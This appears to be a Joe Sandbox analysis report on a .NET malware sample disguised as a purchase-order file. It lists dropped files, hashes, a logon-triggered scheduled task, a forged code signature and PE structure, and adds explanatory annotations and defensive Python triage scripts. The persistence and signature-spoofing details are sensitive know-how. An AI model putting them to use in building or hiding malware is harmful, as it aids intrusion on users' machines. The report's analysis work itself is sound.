                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:true
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1216
                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                            Malicious:false
                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):2232
                                                                                                            Entropy (8bit):5.379460230152629
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugei/ZPUyus:fLHyIFKL3IZ2KRH9Ougss
                                                                                                            MD5:13A0210EC58120EB2CD3445DB5AA3776
                                                                                                            SHA1:3F4A3CC558C2298A0A4A5550005867DA4CE17040
                                                                                                            SHA-256:8668682A9DF285C90FBF4AF490B8569E4261A3934650B51A659A229C80F6F391
                                                                                                            SHA-512:35B241B4A5E13ECF18A6E45A5AD8B34EDCDBBBBF6235A200C1FB346A66626161D96578B361044AD0AFB221502C0D2F1A25633D53B76BAD2DD67BE2F91C91463C
                                                                                                            Malicious:false
                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                            Process:C:\Windows\SysWOW64\runas.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
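The SQLite 3 values in the File Type line above (page size 2048, 56 pages, file counter 2, schema cookie 0x24, schema format 4, UTF-8, library version 3035005) all come from the fixed 100-byte header at the start of the file, so they can be verified directly and cross-checked against the reported size: 56 pages of 2048 bytes is exactly 114688 bytes, which means the copy written by runas.exe is complete rather than truncated mid-write. The Python below is an added example and is not part of the Joe Sandbox report or of any tool it names; the header bytes it builds are constructed to reproduce the values shown above, and the report does not identify which database this is, so nothing here assumes a particular browser or table layout.

```python
"""Parse the 100-byte SQLite 3 file header of a dropped file and cross-check
it against the size a sandbox reports. Added example, not part of the Joe
Sandbox report. build_header() produces CONSTRUCTED sample bytes that match
the values in the report's File Type line."""
import struct

HEADER_MAGIC = b"SQLite format 3\x00"
ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def build_header(page_size=2048, change_counter=2, pages=56, schema_cookie=0x24,
                 schema_format=4, encoding=1, version_valid_for=2,
                 sqlite_version=3035005):
    """Constructed sample input: a header with the values seen in the report."""
    hdr = bytearray(100)
    hdr[0:16] = HEADER_MAGIC
    # Offset 16: page size, big-endian; the value 1 encodes 65536.
    struct.pack_into(">H", hdr, 16, 1 if page_size == 65536 else page_size)
    hdr[18] = hdr[19] = 2                      # write/read version 2 = WAL mode
    hdr[21], hdr[22], hdr[23] = 64, 32, 32     # fixed payload-fraction bytes
    # Offsets 24..47: change counter, page count, freelist trunk, freelist
    # count, schema cookie, schema format number.
    struct.pack_into(">IIIIII", hdr, 24, change_counter, pages, 0, 0,
                     schema_cookie, schema_format)
    struct.pack_into(">I", hdr, 56, encoding)  # text encoding
    # Offsets 92 and 96: version-valid-for and SQLITE_VERSION_NUMBER.
    struct.pack_into(">II", hdr, 92, version_valid_for, sqlite_version)
    return bytes(hdr)


def version_string(number):
    """3035005 -> '3.35.5' (SQLite packs X.Y.Z as X*1000000 + Y*1000 + Z)."""
    return f"{number // 1000000}.{(number // 1000) % 1000}.{number % 1000}"


def parse_sqlite_header(data):
    """Return the header fields a triage analyst cares about; raise on junk."""
    if len(data) < 100 or data[:16] != HEADER_MAGIC:
        raise ValueError("not an SQLite 3 database header")
    raw_page = struct.unpack_from(">H", data, 16)[0]
    page_size = 65536 if raw_page == 1 else raw_page
    if page_size & (page_size - 1) or not 512 <= page_size <= 65536:
        raise ValueError(f"invalid page size {page_size}")
    fields = struct.unpack_from(">IIIIII", data, 24)
    encoding = struct.unpack_from(">I", data, 56)[0]
    version_valid_for, sqlite_version = struct.unpack_from(">II", data, 92)
    return {
        "page_size": page_size,
        "change_counter": fields[0],
        "pages": fields[1],
        "schema_cookie": fields[4],
        "schema_format": fields[5],
        "encoding": ENCODINGS.get(encoding, f"unknown({encoding})"),
        "version_valid_for": version_valid_for,
        "sqlite_version": sqlite_version,
        "version_string": version_string(sqlite_version),
        "wal_mode": data[18] == 2,
        "expected_size": page_size * fields[1],
    }


def size_matches(data, reported_size):
    """True when page_size * pages equals the byte count the sandbox reports.
    A mismatch means the file was truncated or still being written when
    the sandbox captured it, so its contents cannot be trusted as complete."""
    return parse_sqlite_header(data)["expected_size"] == reported_size


if __name__ == "__main__":
    sample = build_header()
    print(parse_sqlite_header(sample))
    print("size consistent with report:", size_matches(sample, 114688))
```

Running the script against the real dropped file is a matter of replacing `build_header()` with the first 100 bytes read from disk; the page-size sanity check matters because a stealer that copies a database while the browser holds it open can leave a header that no longer matches the body.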
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
Seven further entries, each dropped by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, are byte-identical to the entry above (ASCII text, 60 bytes, MD5 D17FE0A3F47BE24A6453E9EF58C94641, SHA-256 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7, Malicious:false) and are not repeated here. Files with exactly this content are the __PSScriptPolicyTest_*.ps1 probes that powershell.exe itself writes to the user's temp directory at start-up to find out whether an AppLocker or WDAC script-enforcement policy is in effect; the report does not show their paths. They are evidence that PowerShell was launched (eight instances in this run), not payload dropped by the sample.
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1578
                                                                                                            Entropy (8bit):5.113635396296077
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                            MD5:174DBEDA5B2271DBBE12F71A9CB62DF1
                                                                                                            SHA1:D56C8AF265AB47310804508BE51B3F8D333BBD44
                                                                                                            SHA-256:D989663B3E8C79586FD87B935DBD5831DA3D00A9B3BAFAB47C3FD77702AA2A84
                                                                                                            SHA-512:70CE9245DA8D453F5E77C36AD7DB958FE5F180594E943843EBA9F3DB20C1448D8457E1C539A7C53DFB476AD850C21D75F7FF639CDAFF55033C6BBD634CA300F5
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                            Process:C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exe
                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1578
                                                                                                            Entropy (8bit):5.113635396296077
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTJv
                                                                                                            MD5:174DBEDA5B2271DBBE12F71A9CB62DF1
                                                                                                            SHA1:D56C8AF265AB47310804508BE51B3F8D333BBD44
                                                                                                            SHA-256:D989663B3E8C79586FD87B935DBD5831DA3D00A9B3BAFAB47C3FD77702AA2A84
                                                                                                            SHA-512:70CE9245DA8D453F5E77C36AD7DB958FE5F180594E943843EBA9F3DB20C1448D8457E1C539A7C53DFB476AD850C21D75F7FF639CDAFF55033C6BBD634CA300F5
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
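The two dropped copies above (same hash, written first by the sample and again by STiokuWkiGFJ.exe) are a plain Task Scheduler XML definition: an enabled LogonTrigger for the interactive user, LeastPrivilege, StartWhenAvailable, hard termination disallowed, and a RegistrationInfo date of 2014 that predates the binary's own PE timestamp (Nov 2024), which is consistent with a task template carried inside the loader rather than a task generated on the host. The report also notes the file is ASCII text although it declares encoding="UTF-16". The following Python is an added example for triaging such a file; it is not Joe Sandbox code. Its embedded sample XML is constructed from the fields visible in the preview; the preview is truncated before `<Actions>`, so the command in the sample is a placeholder, not a value recovered from this malware.

```python
"""Triage a Windows Task Scheduler XML definition.

Added example, not Joe Sandbox code. SAMPLE_TASK_XML is constructed from the
fields visible in the dropped file's preview; the <Actions> element (cut off
in the preview) holds a placeholder command.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample. Like the dropped file it declares UTF-16 but is stored
# as plain ASCII with no BOM (the report's File Type says "ASCII text").
SAMPLE_TASK_XML = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled><UserId>user-PC\\user</UserId></LogonTrigger>
    <RegistrationTrigger><Enabled>false</Enabled></RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec><Command>C:\\PLACEHOLDER\\not-from-the-report.exe</Command></Exec>
  </Actions>
</Task>
"""


def load_task_xml(raw: bytes) -> ET.Element:
    """Parse task XML whether or not its declared encoding is honest.

    schtasks normally writes UTF-16 with a BOM. This sample has no BOM and is
    ASCII yet declares UTF-16, so decode by what the bytes actually are and
    drop the declaration before handing the text to the parser.
    """
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    elif b"\x00" in raw[:4]:          # BOM-less UTF-16; LE is the Windows default
        text = raw.decode("utf-16-le")
    else:
        text = raw.decode("utf-8")
    text = re.sub(r"^<\?xml[^>]*\?>", "", text.lstrip(), count=1).lstrip()
    return ET.fromstring(text)


def triage_task(root: ET.Element) -> dict:
    """Extract the persistence-relevant fields and derive triage flags."""
    def txt(path: str):
        return (root.findtext(path, None, NS) or "").strip() or None

    triggers = []
    trig_node = root.find("t:Triggers", NS)
    for trig in (list(trig_node) if trig_node is not None else []):
        kind = trig.tag.split("}")[-1]                      # strip the namespace
        enabled = (trig.findtext("t:Enabled", "true", NS) or "").strip().lower() != "false"
        triggers.append((kind, enabled))
    commands = [c.text.strip() for c in root.findall("t:Actions/t:Exec/t:Command", NS) if c.text]
    run_level = txt("t:Principals/t:Principal/t:RunLevel")

    flags = []
    if any(k == "LogonTrigger" and en for k, en in triggers):
        flags.append("logon-persistence")
    if txt("t:Settings/t:StartWhenAvailable") == "true":
        flags.append("catches-up-missed-starts")
    if txt("t:Settings/t:AllowHardTerminate") == "false":
        flags.append("resists-hard-terminate")
    if run_level == "HighestAvailable":                     # not the case for this sample
        flags.append("elevated")
    return {
        "author": txt("t:RegistrationInfo/t:Author"),
        "registered": txt("t:RegistrationInfo/t:Date"),
        "run_level": run_level,
        "logon_type": txt("t:Principals/t:Principal/t:LogonType"),
        "triggers": triggers,
        "commands": commands,
        "flags": flags,
    }


if __name__ == "__main__":
    for key, value in triage_task(load_task_xml(SAMPLE_TASK_XML)).items():
        print(f"{key:11}: {value}")
```

On a live host the same fields come out of `Get-ScheduledTask | Export-ScheduledTask`, which is where to look for the task name and the real `<Actions>` that the preview does not show.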
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1001992
                                                                                                            Entropy (8bit):7.826886814961456
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:I1CYeyNf9/bClxa1ymQOTwzQhakpr6h1NhMue8DgO:7Yeyh+nO1xwshanRMP8DV
                                                                                                            MD5:574C0E8C1D426321E95BD8476334F271
                                                                                                            SHA1:0B43D8C96BBECE4A501991AD1A0761A4710176C5
                                                                                                            SHA-256:7E1C2D14EBC29AE8D1434D9D18D6054A16E91385051D7BB9ED183A63FAFA66B8
                                                                                                            SHA-512:95A57D7B2180EF137295961105F970BEAB46E1BDA6B6ABC134B452FE1CC63F8C14C6775F2A31933C8BB8F7E3D60C409BD64F670C5C5F863E4C9CB47F2498656B
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 55%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wFg..............0......,........... ... ....@.. ....................................@.....................................O.... ...(...............6...`..........T............................................ ............... ..H............text........ ...................... ..`.rsrc....(... ...*..................@..@.reloc.......`......................@..B........................H.......tC..HO...............T...........................................0............}......}.....s!...}......}......}.....("......(......{...........%.r...p(#...s$....%.r...p(#...s$....%.r!..p(#...s$........M...%.+...(%...s$...(&...ra..p ............%...%...o'....*&..(.....*&..(.....*..0..h..........{....o(....+...()...t.......o........(*...-...........o.......(.......}.....{....o+.....{.....o,....*........#1.......0............2..2...8.....s...... ....o-..... ....o......%o
                                                                                                            Process:C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):26
                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                            Malicious:true
                                                                                                            Preview:[ZoneTransfer]....ZoneId=0 (a Zone.Identifier alternate data stream; ZoneId=0 is the Local Machine zone, so the dropped copy carries no Mark-of-the-Web and neither SmartScreen nor the "file from the Internet" prompts apply to it)
                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Entropy (8bit):7.826886814961456
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:Pre Alert PO TVKJEANSA00967.bat.exe
                                                                                                            File size:1'001'992 bytes
                                                                                                            MD5:574c0e8c1d426321e95bd8476334f271
                                                                                                            SHA1:0b43d8c96bbece4a501991ad1a0761a4710176c5
                                                                                                            SHA256:7e1c2d14ebc29ae8d1434d9d18d6054a16e91385051d7bb9ed183a63fafa66b8
                                                                                                            SHA512:95a57d7b2180ef137295961105f970beab46e1bda6b6abc134b452fe1cc63f8c14c6775f2a31933c8bb8f7e3d60c409bd64f670c5c5f863e4c9cb47f2498656b
                                                                                                            SSDEEP:24576:I1CYeyNf9/bClxa1ymQOTwzQhakpr6h1NhMue8DgO:7Yeyh+nO1xwshanRMP8DV
                                                                                                            TLSH:A92512E4134AC503E1D26B7009B1E7BA3B791EC9B811C327D7ECFCEB3896315A559262
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....wFg..............0......,........... ... ....@.. ....................................@................................
                                                                                                            Icon Hash:1b79c89ef671c7e5
                                                                                                            Entrypoint:0x4f04e2
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:true (meaning only that an Authenticode blob is present in the security directory; it does not verify against this file, see Signature Valid below)
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x67467711 [Wed Nov 27 01:34:09 2024 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744 (the import hash shared by essentially every .NET executable, whose only native import is mscoree!_CorExeMain; it carries no sample-specific signal)
                                                                                                            Signature Valid:false
                                                                                                            Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                            Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the Authenticode hash of this file does not match the hash inside the signed blob, so either the file was modified after signing or the signature block was copied from another binary)
                                                                                                            Not Before:13/11/2018 00:00:00
                                                                                                            Not After:08/11/2021 23:59:59 (expired three years before the PE timestamp of 27 Nov 2024; an expired certificate alone is tolerated when a trusted countersignature timestamp covers the signing time, but that never rescues a digest mismatch)
                                                                                                            Subject Chain
                                                                                                            • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB (the PuTTY author's code-signing identity; a digest-mismatched block in his name on a .NET FormBook loader indicates a signature lifted from a legitimately signed binary, not a signature over this file)
                                                                                                            Version:3
                                                                                                            Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                            Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                            Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                            Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                            Instruction
                                                                                                            jmp dword ptr [00402000h]    ; through the single IAT slot at RVA 0x2000: the 6-byte native stub every .NET executable has, which transfers to mscoree!_CorExeMain. Only this instruction is code; the bytes that follow are not code and the disassembler is rendering data as instructions.
                                                                                                            push ebx
                                                                                                            add byte ptr [ecx+00h], bh
                                                                                                            jnc 00007F6298B3E342h
                                                                                                            je 00007F6298B3E342h
                                                                                                            add byte ptr [ebp+00h], ch
                                                                                                            add byte ptr [ecx+00h], al
                                                                                                            arpl word ptr [eax], ax
                                                                                                            je 00007F6298B3E342h
                                                                                                            imul eax, dword ptr [eax], 00610076h
                                                                                                            je 00007F6298B3E342h
                                                                                                            outsd
                                                                                                            add byte ptr [edx+00h], dh
                                                                                                            add byte ptr [eax], al    ; x81: zero bytes (00 00) to the end of the listing, rendered as instructions
                                                                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0xf048d          0x4f          .text
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0xf2000          0x28fc        .rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0xf1400          0x3608        (none: this entry is a raw file offset, not an RVA; the Authenticode blob sits after the last section's raw data, 0xf1400 + 0x3608 = 1'001'992 = the file size)
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0xf6000          0xc           .reloc
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0xee78c          0x54          .text
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text (CLR header: the file is a managed assembly)
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
.text  | 0x2000          | 0xee508      | 0xee600  | a11a73d8ff8d7f192f70ac3513bd0dba | False    | 0.9329188106318825 | data      | 7.830225763539746   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc  | 0xf2000         | 0x28fc       | 0x2a00   | addd1b43db278810783e1e5a3bd54c9d | False    | 0.8694196428571429 | data      | 7.47655297874276    | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xf6000         | 0xc          | 0x200    | c323e1d9573eea8a4b5a74d8937d0b0e | False    | 0.044921875        | data      | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name          | RVA     | Size   | Type                                                                                   | Language | Country | ZLIB Complexity
